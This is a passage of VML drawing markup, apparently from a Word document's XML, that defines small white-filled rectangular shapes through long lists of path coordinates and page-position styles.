,2996,10959,2996,10959,2996,10958,2996,10957,2996,10957,2996,10956,2996,10956,2996,10955,2996,10954,2996,10953,2996,10952,2996,10952,2996,10951,2996,10950,2996,10949,2996,10948,2996,10947,2996,10946,2996,10944,2996,10943,2996,10942,2996,10941,2996,10939,2996,10938,2996,10936,2996,10935,2996,10933,2996,10932,2996,10930,2996,10928,2996,10927,2996,10925,2996,10923,2996,10921,2996,10919,2996,10917,2996,10915,2996,10913,2996,10910,2996,10908,2996,10906,2996,10903,2996,10901,2996,10898,2996,10895,2996,10893,2996,10890,2996,10887,2996,10884,2996,10881,2996,10878,2996,10875,2996,10872,2996,10868,2996,10865,2996,10861,2996,10858,2996,10854,2996,10850,2996,10847,2996,10843,2996,10839,2996,10835,2996,10831,2996,10826,2996,10822,2996,10818,2996,10813,2996,10809,2996,10804,2996,10799,2996,10794,2996,10789,2996,10784,2996,10779,2996,10774,2996,10768,2996,10763,2996,10757,2996,10752,2996,10746,2996,10740,2996,10734,2996,10728,2996,10722,2996,10716,2996,10709e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:118.500pt;margin-top:641.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2370,12830" coordsize="130,250">
        <v:shape style="position:absolute;left:2370;top:12830;width:130;height:250" coordorigin="2370,12830" coordsize="130,250" path="m2395,12840l2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2395,12840,2396,12840,2396,12840,2396,12840,2396,12840,2396,12840,2396,12840,2396,12840,2396,12840,2396,12840,2396,12840,2397,12840,2397,12840,2397,12840,2397,12840,2397,12840,2398,12840,2398,12840,2398,12840,2398,12840,2399,12840,2399,12840,2399,12840,2399,12840,2400,12840,2400,12840,2400,12840,2401,12840,2401,12840,2402,12840,2402,12840,2403,12840,2403,12840,2404,12840,2404,12840,2405,12840,2405,12840,2406,12840,2406,12840,2407,12840,2408,12840,2408,12840,2409,12840,2410,12840,2411,12840,2411,12840,2412,12840,2413,12840,2414,12840,2415,12840,2416,12840,2417,12840,2418,12840,2419,12840,2420,12840,2421,12840,2422,12840,2423,12840,2424,12840,2425,12840,2426,12840,2428,12840,2429,12840,2430,12840,2432,12840,2433,12840,2434,12840,2436,12840,2437,12840,2439,12840,2441,12840,2442,12840,2444,12840,2445,12840,2447,12840,2449,12840,2451,12840,2453,12840,2454,12840,2456,12840,2458,12840,2460,12840,2462,12840,2464,12840,2466,12840,2469,12840,2471,12840,2473,12840,2475,12840,2478,12840,2480,12840,2482,12840,2485,12840,2487,12840,2490,12840,2493,12840,2495,12840,2498,12840,2501,12840,2504,12840,2506,12840,2509,12840,2512,12840,2515,12840,2515,12840,2515,12840,2515,12840,2515,12840,2515,12840,2515,12840,2515,12841,2515,12841,2515,12841,2515,12841,2515,12841,2515,12841,2515,12841,2515,12841,2515,12841,2515,12841,2515,12841,2515,12841,2515,12841,2515,12842,2515,12842,2515,12842,2515,12842,2515,12842,2515,12843,2515,12843,2515,12843,2515,12843,2515,12844,2515,12844,2515,12845,2515,12845,2515,12845,2515,12846,2515,12846,2515,12847,2515,12848,2515,12848,2515,12849,2515,12849,2515,12850,2515,12851,2515,12852,2515,12853,2515,12853,2515,12854,2515,12855,2515,12856,2515,12857,2515,12858,2515,12859,2515,12861,2515,12862,2515,12863,2515,12864,2515,12866,2515,12867,2515,12869,2515,12870,2515,12872,2515,12873,2515,12875,2515,12877,2515,12878,2515,12880,2515,12882,2515,12884,2515,12886,2515,12888,2515,12890,2515,12892,2515,12895,2515,12897,2515,12899,2515,12902,2515,12904,2515,12907,2515,12910,2515,12912,2515,12915,2515,12918,2515,12921,2515,12924,2515,12927,2515,12930,2515,12933,2515,12937,2515,12940,2515,12944,2515,12947,2515,12951,2515,12955,2515,12958,2515,12962,2515,12966,2515,12970,2515,12974,2515,12979,2515,12983,2515,12987,2515,12992,2515,12996,2515,13001,2515,13006,2515,13011,2515,13016,2515,13021,2515,13026,2515,13031,2515,13037,2515,13042,2515,13048,2515,13053,2515,13059,2515,13065,2515,13071,2515,13077,2515,13083,2515,13089,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2515,13096,2514,13096,2514,13096,2514,13096,2514,13096,2514,13096,2514,13096,2514,13096,2513,13096,2513,13096,2513,13096,2513,13096,2512,13096,2512,13096,2512,13096,2512,13096,2511,13096,2511,13096,2511,13096,2510,13096,2510,13096,2510,13096,2509,13096,2509,13096,2508,13096,2508,13096,2507,13096,2507,13096,2506,13096,2506,13096,2505,13096,2505,13096,2504,13096,2503,13096,2503,13096,2502,13096,2501,13096,2501,13096,2500,13096,2499,13096,2498,13096,2497,13096,2497,13096,2496,13096,2495,13096,2494,13096,2493,13096,2492,13096,2491,13096,2490,13096,2489,13096,2488,13096,2486,13096,2485,13096,2484,13096,2483,13096,2481,13096,2480,13096,2479,13096,2477,13096,2476,13096,2475,13096,2473,13096,2472,13096,2470,13096,2468,13096,2467,13096,2465,13096,2463,13096,2462,13096,2460,13096,2458,13096,2456,13096,2454,13096,2452,13096,2450,13096,2448,13096,2446,13096,2444,13096,2442,13096,2440,13096,2437,13096,2435,13096,2433,13096,2430,13096,2428,13096,2426,13096,2423,13096,2420,13096,2418,13096,2415,13096,2412,13096,2410,13096,2407,13096,2404,13096,2401,13096,2398,13096,2395,13096,2395,13096,2395,13096,2395,13096,2395,13096,2395,13096,2395,13096,2395,13096,2395,13096,2395,13096,2395,13095,2395,13095,2395,13095,2395,13095,2395,13095,2395,13095,2395,13095,2395,13095,2395,13095,2395,13095,2395,13095,2395,13094,2395,13094,2395,13094,2395,13094,2395,13094,2395,13093,2395,13093,2395,13093,2395,13092,2395,13092,2395,13092,2395,13091,2395,13091,2395,13090,2395,13090,2395,13089,2395,13089,2395,13088,2395,13087,2395,13087,2395,13086,2395,13085,2395,13084,2395,13084,2395,13083,2395,13082,2395,13081,2395,13080,2395,13079,2395,13078,2395,13077,2395,13076,2395,13074,2395,13073,2395,13072,2395,13070,2395,13069,2395,13068,2395,13066,2395,13065,2395,13063,2395,13061,2395,13060,2395,13058,2395,13056,2395,13054,2395,13052,2395,13050,2395,13048,2395,13046,2395,13044,2395,13041,2395,13039,2395,13037,2395,13034,2395,13032,2395,13029,2395,13026,2395,13024,2395,13021,2395,13018,2395,13015,2395,13012,2395,13009,2395,13006,2395,13003,2395,12999,2395,12996,2395,12992,2395,12989,2395,12985,2395,12982,2395,12978,2395,12974,2395,12970,2395,12966,2395,12962,2395,12957,2395,12953,2395,12949,2395,12944,2395,12940,2395,12935,2395,12930,2395,12925,2395,12920,2395,12915,2395,12910,2395,12905,2395,12900,2395,12894,2395,12889,2395,12883,2395,12877,2395,12871,2395,12865,2395,12859,2395,12853,2395,12847,2395,12840e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:106.500pt;margin-top:659.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2130,13190" coordsize="130,250">
        <v:shape style="position:absolute;left:2130;top:13190;width:130;height:250" coordorigin="2130,13190" coordsize="130,250" path="m2155,13201l2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2155,13201,2156,13201,2156,13201,2156,13201,2156,13201,2156,13201,2156,13201,2156,13201,2156,13201,2156,13201,2157,13201,2157,13201,2157,13201,2157,13201,2157,13201,2158,13201,2158,13201,2158,13201,2158,13201,2159,13201,2159,13201,2159,13201,2160,13201,2160,13201,2160,13201,2161,13201,2161,13201,2162,13201,2162,13201,2162,13201,2163,13201,2163,13201,2164,13201,2165,13201,2165,13201,2166,13201,2166,13201,2167,13201,2168,13201,2168,13201,2169,13201,2170,13201,2170,13201,2171,13201,2172,13201,2173,13201,2174,13201,2175,13201,2176,13201,2177,13201,2177,13201,2178,13201,2180,13201,2181,13201,2182,13201,2183,13201,2184,13201,2185,13201,2186,13201,2188,13201,2189,13201,2190,13201,2192,13201,2193,13201,2194,13201,2196,13201,2197,13201,2199,13201,2200,13201,2202,13201,2204,13201,2205,13201,2207,13201,2209,13201,2211,13201,2212,13201,2214,13201,2216,13201,2218,13201,2220,13201,2222,13201,2224,13201,2226,13201,2228,13201,2231,13201,2233,13201,2235,13201,2238,13201,2240,13201,2242,13201,2245,13201,2247,13201,2250,13201,2253,13201,2255,13201,2258,13201,2261,13201,2263,13201,2266,13201,2269,13201,2272,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13202,2275,13202,2275,13202,2275,13202,2275,13202,2275,13202,2275,13203,2275,13203,2275,13203,2275,13204,2275,13204,2275,13204,2275,13205,2275,13205,2275,13206,2275,13206,2275,13207,2275,13207,2275,13208,2275,13208,2275,13209,2275,13210,2275,13210,2275,13211,2275,13212,2275,13213,2275,13214,2275,13214,2275,13215,2275,13216,2275,13217,2275,13218,2275,13220,2275,13221,2275,13222,2275,13223,2275,13224,2275,13226,2275,13227,2275,13229,2275,13230,2275,13232,2275,13233,2275,13235,2275,13237,2275,13239,2275,13240,2275,13242,2275,13244,2275,13246,2275,13248,2275,13250,2275,13253,2275,13255,2275,13257,2275,13260,2275,13262,2275,13265,2275,13267,2275,13270,2275,13272,2275,13275,2275,13278,2275,13281,2275,13284,2275,13287,2275,13290,2275,13294,2275,13297,2275,13300,2275,13304,2275,13307,2275,13311,2275,13315,2275,13319,2275,13322,2275,13326,2275,13330,2275,13335,2275,13339,2275,13343,2275,13348,2275,13352,2275,13357,2275,13361,2275,13366,2275,13371,2275,13376,2275,13381,2275,13386,2275,13391,2275,13397,2275,13402,2275,13408,2275,13413,2275,13419,2275,13425,2275,13431,2275,13437,2275,13443,2275,13449,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2274,13456,2274,13456,2274,13456,2274,13456,2274,13456,2274,13456,2274,13456,2274,13456,2273,13456,2273,13456,2273,13456,2273,13456,2273,13456,2272,13456,2272,13456,2272,13456,2272,13456,2271,13456,2271,13456,2271,13456,2270,13456,2270,13456,2269,13456,2269,13456,2269,13456,2268,13456,2268,13456,2267,13456,2267,13456,2266,13456,2266,13456,2265,13456,2265,13456,2264,13456,2263,13456,2263,13456,2262,13456,2261,13456,2261,13456,2260,13456,2259,13456,2258,13456,2257,13456,2256,13456,2256,13456,2255,13456,2254,13456,2253,13456,2252,13456,2251,13456,2250,13456,2249,13456,2247,13456,2246,13456,2245,13456,2244,13456,2243,13456,2241,13456,2240,13456,2239,13456,2237,13456,2236,13456,2234,13456,2233,13456,2231,13456,2230,13456,2228,13456,2227,13456,2225,13456,2223,13456,2221,13456,2220,13456,2218,13456,2216,13456,2214,13456,2212,13456,2210,13456,2208,13456,2206,13456,2204,13456,2202,13456,2200,13456,2197,13456,2195,13456,2193,13456,2190,13456,2188,13456,2185,13456,2183,13456,2180,13456,2178,13456,2175,13456,2172,13456,2170,13456,2167,13456,2164,13456,2161,13456,2158,13456,2155,13456,2155,13456,2155,13456,2155,13456,2155,13456,2155,13456,2155,13456,2155,13456,2155,13456,2155,13456,2155,13456,2155,13456,2155,13456,2155,13456,2155,13455,2155,13455,2155,13455,2155,13455,2155,13455,2155,13455,2155,13455,2155,13455,2155,13454,2155,13454,2155,13454,2155,13454,2155,13453,2155,13453,2155,13453,2155,13452,2155,13452,2155,13452,2155,13451,2155,13451,2155,13450,2155,13450,2155,13449,2155,13449,2155,13448,2155,13447,2155,13447,2155,13446,2155,13445,2155,13445,2155,13444,2155,13443,2155,13442,2155,13441,2155,13440,2155,13439,2155,13438,2155,13437,2155,13436,2155,13434,2155,13433,2155,13432,2155,13431,2155,13429,2155,13428,2155,13426,2155,13425,2155,13423,2155,13421,2155,13420,2155,13418,2155,13416,2155,13414,2155,13412,2155,13410,2155,13408,2155,13406,2155,13404,2155,13402,2155,13399,2155,13397,2155,13394,2155,13392,2155,13389,2155,13387,2155,13384,2155,13381,2155,13378,2155,13375,2155,13372,2155,13369,2155,13366,2155,13363,2155,13359,2155,13356,2155,13353,2155,13349,2155,13345,2155,13342,2155,13338,2155,13334,2155,13330,2155,13326,2155,13322,2155,13318,2155,13313,2155,13309,2155,13304,2155,13300,2155,13295,2155,13290,2155,13285,2155,13281,2155,13275,2155,13270,2155,13265,2155,13260,2155,13254,2155,13249,2155,13243,2155,13237,2155,13231,2155,13226,2155,13219,2155,13213,2155,13207,2155,13201e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:112.500pt;margin-top:659.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2250,13190" coordsize="130,250">
        <v:shape style="position:absolute;left:2250;top:13190;width:130;height:250" coordorigin="2250,13190" coordsize="130,250" path="m2275,13201l2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2275,13201,2276,13201,2276,13201,2276,13201,2276,13201,2276,13201,2276,13201,2276,13201,2276,13201,2276,13201,2277,13201,2277,13201,2277,13201,2277,13201,2277,13201,2277,13201,2278,13201,2278,13201,2278,13201,2278,13201,2279,13201,2279,13201,2279,13201,2280,13201,2280,13201,2280,13201,2281,13201,2281,13201,2282,13201,2282,13201,2283,13201,2283,13201,2284,13201,2284,13201,2285,13201,2285,13201,2286,13201,2286,13201,2287,13201,2288,13201,2288,13201,2289,13201,2290,13201,2291,13201,2291,13201,2292,13201,2293,13201,2294,13201,2295,13201,2296,13201,2297,13201,2298,13201,2299,13201,2300,13201,2301,13201,2302,13201,2303,13201,2304,13201,2305,13201,2306,13201,2308,13201,2309,13201,2310,13201,2312,13201,2313,13201,2314,13201,2316,13201,2317,13201,2319,13201,2320,13201,2322,13201,2324,13201,2325,13201,2327,13201,2329,13201,2331,13201,2332,13201,2334,13201,2336,13201,2338,13201,2340,13201,2342,13201,2344,13201,2346,13201,2349,13201,2351,13201,2353,13201,2355,13201,2358,13201,2360,13201,2362,13201,2365,13201,2367,13201,2370,13201,2373,13201,2375,13201,2378,13201,2381,13201,2384,13201,2386,13201,2389,13201,2392,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13201,2395,13202,2395,13202,2395,13202,2395,13202,2395,13202,2395,13202,2395,13203,2395,13203,2395,13203,2395,13204,2395,13204,2395,13204,2395,13205,2395,13205,2395,13206,2395,13206,2395,13207,2395,13207,2395,13208,2395,13208,2395,13209,2395,13210,2395,13210,2395,13211,2395,13212,2395,13213,2395,13214,2395,13214,2395,13215,2395,13216,2395,13217,2395,13218,2395,13220,2395,13221,2395,13222,2395,13223,2395,13224,2395,13226,2395,13227,2395,13229,2395,13230,2395,13232,2395,13233,2395,13235,2395,13237,2395,13239,2395,13240,2395,13242,2395,13244,2395,13246,2395,13248,2395,13250,2395,13253,2395,13255,2395,13257,2395,13260,2395,13262,2395,13265,2395,13267,2395,13270,2395,13272,2395,13275,2395,13278,2395,13281,2395,13284,2395,13287,2395,13290,2395,13294,2395,13297,2395,13300,2395,13304,2395,13307,2395,13311,2395,13315,2395,13319,2395,13322,2395,13326,2395,13330,2395,13335,2395,13339,2395,13343,2395,13348,2395,13352,2395,13357,2395,13361,2395,13366,2395,13371,2395,13376,2395,13381,2395,13386,2395,13391,2395,13397,2395,13402,2395,13408,2395,13413,2395,13419,2395,13425,2395,13431,2395,13437,2395,13443,2395,13449,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2395,13456,2394,13456,2394,13456,2394,13456,2394,13456,2394,13456,2394,13456,2394,13456,2393,13456,2393,13456,2393,13456,2393,13456,2393,13456,2392,13456,2392,13456,2392,13456,2392,13456,2391,13456,2391,13456,2391,13456,2390,13456,2390,13456,2390,13456,2389,13456,2389,13456,2388,13456,2388,13456,2387,13456,2387,13456,2386,13456,2386,13456,2385,13456,2385,13456,2384,13456,2383,13456,2383,13456,2382,13456,2381,13456,2381,13456,2380,13456,2379,13456,2378,13456,2377,13456,2377,13456,2376,13456,2375,13456,2374,13456,2373,13456,2372,13456,2371,13456,2370,13456,2369,13456,2367,13456,2366,13456,2365,13456,2364,13456,2363,13456,2361,13456,2360,13456,2359,13456,2357,13456,2356,13456,2354,13456,2353,13456,2351,13456,2350,13456,2348,13456,2347,13456,2345,13456,2343,13456,2342,13456,2340,13456,2338,13456,2336,13456,2334,13456,2332,13456,2330,13456,2328,13456,2326,13456,2324,13456,2322,13456,2320,13456,2317,13456,2315,13456,2313,13456,2310,13456,2308,13456,2305,13456,2303,13456,2300,13456,2298,13456,2295,13456,2292,13456,2290,13456,2287,13456,2284,13456,2281,13456,2278,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13456,2275,13455,2275,13455,2275,13455,2275,13455,2275,13455,2275,13455,2275,13455,2275,13455,2275,13454,2275,13454,2275,13454,2275,13454,2275,13453,2275,13453,2275,13453,2275,13452,2275,13452,2275,13452,2275,13451,2275,13451,2275,13450,2275,13450,2275,13449,2275,13449,2275,13448,2275,13447,2275,13447,2275,13446,2275,13445,2275,13445,2275,13444,2275,13443,2275,13442,2275,13441,2275,13440,2275,13439,2275,13438,2275,13437,2275,13436,2275,13434,2275,13433,2275,13432,2275,13431,2275,13429,2275,13428,2275,13426,2275,13425,2275,13423,2275,13421,2275,13420,2275,13418,2275,13416,2275,13414,2275,13412,2275,13410,2275,13408,2275,13406,2275,13404,2275,13402,2275,13399,2275,13397,2275,13394,2275,13392,2275,13389,2275,13387,2275,13384,2275,13381,2275,13378,2275,13375,2275,13372,2275,13369,2275,13366,2275,13363,2275,13359,2275,13356,2275,13353,2275,13349,2275,13345,2275,13342,2275,13338,2275,13334,2275,13330,2275,13326,2275,13322,2275,13318,2275,13313,2275,13309,2275,13304,2275,13300,2275,13295,2275,13290,2275,13285,2275,13281,2275,13275,2275,13270,2275,13265,2275,13260,2275,13254,2275,13249,2275,13243,2275,13237,2275,13231,2275,13226,2275,13219,2275,13213,2275,13207,2275,13201e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:154.500pt;margin-top:659.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3090,13190" coordsize="130,250">
        <v:shape style="position:absolute;left:3090;top:13190;width:130;height:250" coordorigin="3090,13190" coordsize="130,250" path="m3116,13201l3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3116,13201,3117,13201,3117,13201,3117,13201,3117,13201,3117,13201,3117,13201,3117,13201,3118,13201,3118,13201,3118,13201,3118,13201,3119,13201,3119,13201,3119,13201,3119,13201,3120,13201,3120,13201,3120,13201,3121,13201,3121,13201,3122,13201,3122,13201,3123,13201,3123,13201,3123,13201,3124,13201,3124,13201,3125,13201,3126,13201,3126,13201,3127,13201,3127,13201,3128,13201,3129,13201,3129,13201,3130,13201,3131,13201,3132,13201,3133,13201,3133,13201,3134,13201,3135,13201,3136,13201,3137,13201,3138,13201,3139,13201,3140,13201,3141,13201,3142,13201,3143,13201,3144,13201,3146,13201,3147,13201,3148,13201,3149,13201,3151,13201,3152,13201,3153,13201,3155,13201,3156,13201,3158,13201,3159,13201,3161,13201,3162,13201,3164,13201,3166,13201,3168,13201,3169,13201,3171,13201,3173,13201,3175,13201,3177,13201,3179,13201,3181,13201,3183,13201,3185,13201,3187,13201,3189,13201,3191,13201,3193,13201,3196,13201,3198,13201,3200,13201,3203,13201,3205,13201,3208,13201,3210,13201,3213,13201,3216,13201,3218,13201,3221,13201,3224,13201,3227,13201,3230,13201,3233,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13201,3236,13202,3236,13202,3236,13202,3236,13202,3236,13202,3236,13202,3236,13203,3236,13203,3236,13203,3236,13204,3236,13204,3236,13204,3236,13205,3236,13205,3236,13206,3236,13206,3236,13207,3236,13207,3236,13208,3236,13208,3236,13209,3236,13210,3236,13210,3236,13211,3236,13212,3236,13213,3236,13214,3236,13214,3236,13215,3236,13216,3236,13217,3236,13218,3236,13220,3236,13221,3236,13222,3236,13223,3236,13224,3236,13226,3236,13227,3236,13229,3236,13230,3236,13232,3236,13233,3236,13235,3236,13237,3236,13239,3236,13240,3236,13242,3236,13244,3236,13246,3236,13248,3236,13250,3236,13253,3236,13255,3236,13257,3236,13260,3236,13262,3236,13265,3236,13267,3236,13270,3236,13272,3236,13275,3236,13278,3236,13281,3236,13284,3236,13287,3236,13290,3236,13294,3236,13297,3236,13300,3236,13304,3236,13307,3236,13311,3236,13315,3236,13319,3236,13322,3236,13326,3236,13330,3236,13335,3236,13339,3236,13343,3236,13348,3236,13352,3236,13357,3236,13361,3236,13366,3236,13371,3236,13376,3236,13381,3236,13386,3236,13391,3236,13397,3236,13402,3236,13408,3236,13413,3236,13419,3236,13425,3236,13431,3236,13437,3236,13443,3236,13449,3236,13456,3236,13456,3236,13456,3236,13456,3236,13456,3236,13456,3236,13456,3236,13456,3236,13456,3236,13456,3236,13456,3236,13456,3236,13456,3236,13456,3235,13456,3235,13456,3235,13456,3235,13456,3235,13456,3235,13456,3235,13456,3235,13456,3235,13456,3235,13456,3235,13456,3235,13456,3235,13456,3234,13456,3234,13456,3234,13456,3234,13456,3234,13456,3234,13456,3233,13456,3233,13456,3233,13456,3233,13456,3232,13456,3232,13456,3232,13456,3231,13456,3231,13456,3231,13456,3230,13456,3230,13456,3230,13456,3229,13456,3229,13456,3228,13456,3228,13456,3227,13456,3227,13456,3226,13456,3226,13456,3225,13456,3224,13456,3224,13456,3223,13456,3222,13456,3222,13456,3221,13456,3220,13456,3219,13456,3219,13456,3218,13456,3217,13456,3216,13456,3215,13456,3214,13456,3213,13456,3212,13456,3211,13456,3210,13456,3209,13456,3208,13456,3207,13456,3206,13456,3204,13456,3203,13456,3202,13456,3201,13456,3199,13456,3198,13456,3196,13456,3195,13456,3193,13456,3192,13456,3190,13456,3189,13456,3187,13456,3185,13456,3184,13456,3182,13456,3180,13456,3178,13456,3176,13456,3175,13456,3173,13456,3171,13456,3169,13456,3166,13456,3164,13456,3162,13456,3160,13456,3158,13456,3155,13456,3153,13456,3151,13456,3148,13456,3146,13456,3143,13456,3141,13456,3138,13456,3136,13456,3133,13456,3130,13456,3127,13456,3124,13456,3122,13456,3119,13456,3116,13456,3116,13456,3116,13456,3116,13456,3116,13456,3116,13456,3116,13456,3116,13456,3116,13456,3116,13456,3116,13456,3116,13456,3116,13456,3116,13456,3116,13455,3116,13455,3116,13455,3116,13455,3116,13455,3116,13455,3116,13455,3116,13455,3116,13454,3116,13454,3116,13454,3116,13454,3116,13453,3116,13453,3116,13453,3116,13452,3116,13452,3116,13452,3116,13451,3116,13451,3116,13450,3116,13450,3116,13449,3116,13449,3116,13448,3116,13447,3116,13447,3116,13446,3116,13445,3116,13445,3116,13444,3116,13443,3116,13442,3116,13441,3116,13440,3116,13439,3116,13438,3116,13437,3116,13436,3116,13434,3116,13433,3116,13432,3116,13431,3116,13429,3116,13428,3116,13426,3116,13425,3116,13423,3116,13421,3116,13420,3116,13418,3116,13416,3116,13414,3116,13412,3116,13410,3116,13408,3116,13406,3116,13404,3116,13402,3116,13399,3116,13397,3116,13394,3116,13392,3116,13389,3116,13387,3116,13384,3116,13381,3116,13378,3116,13375,3116,13372,3116,13369,3116,13366,3116,13363,3116,13359,3116,13356,3116,13353,3116,13349,3116,13345,3116,13342,3116,13338,3116,13334,3116,13330,3116,13326,3116,13322,3116,13318,3116,13313,3116,13309,3116,13304,3116,13300,3116,13295,3116,13290,3116,13285,3116,13281,3116,13275,3116,13270,3116,13265,3116,13260,3116,13254,3116,13249,3116,13243,3116,13237,3116,13231,3116,13226,3116,13219,3116,13213,3116,13207,3116,13201e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:106.500pt;margin-top:694.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2130,13890" coordsize="130,270">
        <v:shape style="position:absolute;left:2130;top:13890;width:130;height:270" coordorigin="2130,13890" coordsize="130,270" path="m2155,13906l2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2155,13906,2156,13906,2156,13906,2156,13906,2156,13906,2156,13906,2156,13906,2156,13906,2156,13906,2156,13906,2157,13906,2157,13906,2157,13906,2157,13906,2157,13906,2158,13906,2158,13906,2158,13906,2158,13906,2159,13906,2159,13906,2159,13906,2160,13906,2160,13906,2160,13906,2161,13906,2161,13906,2162,13906,2162,13906,2162,13906,2163,13906,2163,13906,2164,13906,2165,13906,2165,13906,2166,13906,2166,13906,2167,13906,2168,13906,2168,13906,2169,13906,2170,13906,2170,13906,2171,13906,2172,13906,2173,13906,2174,13906,2175,13906,2176,13906,2177,13906,2177,13906,2178,13906,2180,13906,2181,13906,2182,13906,2183,13906,2184,13906,2185,13906,2186,13906,2188,13906,2189,13906,2190,13906,2192,13906,2193,13906,2194,13906,2196,13906,2197,13906,2199,13906,2200,13906,2202,13906,2204,13906,2205,13906,2207,13906,2209,13906,2211,13906,2212,13906,2214,13906,2216,13906,2218,13906,2220,13906,2222,13906,2224,13906,2226,13906,2228,13906,2231,13906,2233,13906,2235,13906,2238,13906,2240,13906,2242,13906,2245,13906,2247,13906,2250,13906,2253,13906,2255,13906,2258,13906,2261,13906,2263,13906,2266,13906,2269,13906,2272,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13906,2275,13907,2275,13907,2275,13907,2275,13907,2275,13907,2275,13907,2275,13907,2275,13908,2275,13908,2275,13908,2275,13908,2275,13909,2275,13909,2275,13909,2275,13910,2275,13910,2275,13911,2275,13911,2275,13911,2275,13912,2275,13912,2275,13913,2275,13914,2275,13914,2275,13915,2275,13916,2275,13916,2275,13917,2275,13918,2275,13919,2275,13920,2275,13921,2275,13922,2275,13923,2275,13924,2275,13925,2275,13926,2275,13927,2275,13929,2275,13930,2275,13931,2275,13933,2275,13934,2275,13936,2275,13937,2275,13939,2275,13940,2275,13942,2275,13944,2275,13946,2275,13948,2275,13950,2275,13952,2275,13954,2275,13956,2275,13958,2275,13960,2275,13963,2275,13965,2275,13967,2275,13970,2275,13972,2275,13975,2275,13978,2275,13981,2275,13984,2275,13986,2275,13989,2275,13993,2275,13996,2275,13999,2275,14002,2275,14006,2275,14009,2275,14013,2275,14016,2275,14020,2275,14024,2275,14028,2275,14032,2275,14036,2275,14040,2275,14044,2275,14049,2275,14053,2275,14057,2275,14062,2275,14067,2275,14071,2275,14076,2275,14081,2275,14086,2275,14091,2275,14097,2275,14102,2275,14108,2275,14113,2275,14119,2275,14124,2275,14130,2275,14136,2275,14142,2275,14148,2275,14155,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2275,14161,2274,14161,2274,14161,2274,14161,2274,14161,2274,14161,2274,14161,2274,14161,2274,14161,2273,14161,2273,14161,2273,14161,2273,14161,2273,14161,2272,14161,2272,14161,2272,14161,2272,14161,2271,14161,2271,14161,2271,14161,2270,14161,2270,14161,2269,14161,2269,14161,2269,14161,2268,14161,2268,14161,2267,14161,2267,14161,2266,14161,2266,14161,2265,14161,2265,14161,2264,